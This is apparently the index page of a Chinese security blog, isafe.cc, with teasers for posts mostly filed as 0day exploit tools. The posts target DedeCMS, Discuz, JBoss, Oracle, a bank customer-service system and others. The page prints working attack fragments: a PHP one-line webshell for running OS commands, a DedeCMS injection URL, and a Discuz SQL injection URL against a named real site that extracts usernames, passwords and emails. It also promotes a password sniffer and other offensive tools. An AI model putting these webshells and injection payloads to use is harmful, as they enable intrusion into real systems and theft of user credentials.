预览模式: 普通 | 列表

*******************************************************************
#工具标题: 『河马』信雅达 在线客服系统 uploadFile.jsp 文件上传漏洞-jsp木马版(0day)
#开发日期: 2015-10-16
#作者: 赵显阳
#测试: 杭州银行,中国银行

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1480

河马web密码嗅探器v1.1




风行是一款集在线点播和下载影视(电影、电视)节目的视频播放软件,具有风行网首创的“边下边看”特点。
最新版的风行电影2.6,以新颖的交互界面,超凡的下载速度,以及海量的影视节目,让您畅快淋漓地享受高品质的影视服务。风行网上看电影,确保全程流畅,
以上是对风行软件的简单介绍,下面就看看风行软件的安全问题,打开程序目录,

查看更多...

Tags: 研究文档

分类:研究文档 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1913

isafe.cc" target="_blank">isafe.cc-欢迎使用
  感谢您使用 『便携式文件夹加密器』

  河马软件致力于为您提供更安全、更高效、更便捷的加密软件。

查看更多...

Tags: 加密

分类:密码哈希解密 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1939

Oracle数据库渗透技术浅析

  
                      
文/图赵显阳(isafe.cc" target="_blank">isafe.cc" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc)
oracle数据库简介
oracle是一个数据库系统,和 MS SQL Server 数据库类似,支持SQL语言的同时还支持ada编程、Java代码编程等,可以运行在Windows,Linux等操作系统上,今天来对如何渗透Oracle数据库系统进行研究,Oracle的漏洞有很多,如默认DBSNMP账号密码,低版本的SID枚举,本地权限提升,一些函数存在SQL注入,缓冲区溢出等等。下面我们先来破解Oracle的登录账号,然后使用Delphi编程在数据库服务器上执行任意命令。
oracle数据库账号破解

查看更多...

分类:oracle密码破解 | 固定链接 | 评论: 3 | 引用: 0 | 查看次数: 9296

dedecms的最近出的一高危漏洞,
存在漏洞的文件/plus/search.php
下面是漏洞的详细利用细节:
    
isafe.cc" target="_blank">isafe.cc/plus/search.php?keyword=as" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc/plus/search.php?keyword=as&typeArr[ uNion ]=a

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 13 | 引用: 0 | 查看次数: 4319

『河马』apache mod_cgi bash 命令注入漏洞



2014年9月24日Bash被公布存在远程代码执行漏洞,河马安全网第一时间根据信息研判,确认该漏洞可以
产生严重的后果,且分布广泛,于北京时间9月24日早晨5时30分启动了分析代码和工具利用编写。
河马安全网针对该漏洞进行了严格地分析验证,确认该漏洞会影响目前主流的Linux和Mac OSX操作系统平
台,包括但不限于Redhat、CentOS、Ubuntu、Debian、Fedora、Amazon Linux、OS X 10.10等平

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2340


【河马】 php一句话木马服务端和客户端v1.1
版本1功能:软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?>
写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令,
支持的函数有system,shell_exec,passthru

查看更多...

Tags: 远程控制

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3238

discuz_7.2_faq.php_注入漏洞利用工具 POC
http://bbs.dianjian.net//faq.php?action=
grouppermission&gids[99]=%27&gids[100]
[0]=)%20and%20(select%201%20from%20
(select%20count(*),concat((select%20(select%20(select%20concat(username,0x23,password,0x23,email)%20f

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2707


eyou 邮件系统存在SQL注入漏洞,利用此漏洞可以获取webshell


查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 3733

【河马】ssh转socks工具--附源代码



【基本简介】 可以简单方便的连接ssh服务器。在SSH服务器用户名和密码处填写对应的用户名和密码,
并选中启动后就链接、掉线后自动连接、启用动态SOCKS,设置完毕后点击保存按钮并点击连接按钮就可以开
始连接啦。

查看更多...

Tags: remote control

分类:远程控制 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1482

在ssl数据包中有一个数据结构,包含了数据的长度(len)和内容(payload),这个数据结构会经过一次

memcpy,这个函数的最后一个参数为复制的长度len,如果len等于payload的长度,就相安无事,
如果len大于payload的长度就会越界,泄露多出来的那段内存,len是一个无符号整数,最大值为
65535,所有能泄露64k的数据,当payload的长度为0时,泄露最大的内存数据。

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1534


JBoss-4.2.3.GA  invoker code exec 漏洞
成功利用该漏洞可以执行任意命令,包括jsp
webshell等。

查看更多...

Tags: 0day

分类:0day利用工具 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 2538

黑客狙击者v1.0



1.将压缩包解压到C:\sniper或D:\sniper目录(目录不存在,自行创建)

2. 切换到软件目录,然后执行:sniper_svc.exe /install 即可

查看更多...

Tags: websmart

分类:其它工具软件 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1383
无标题文档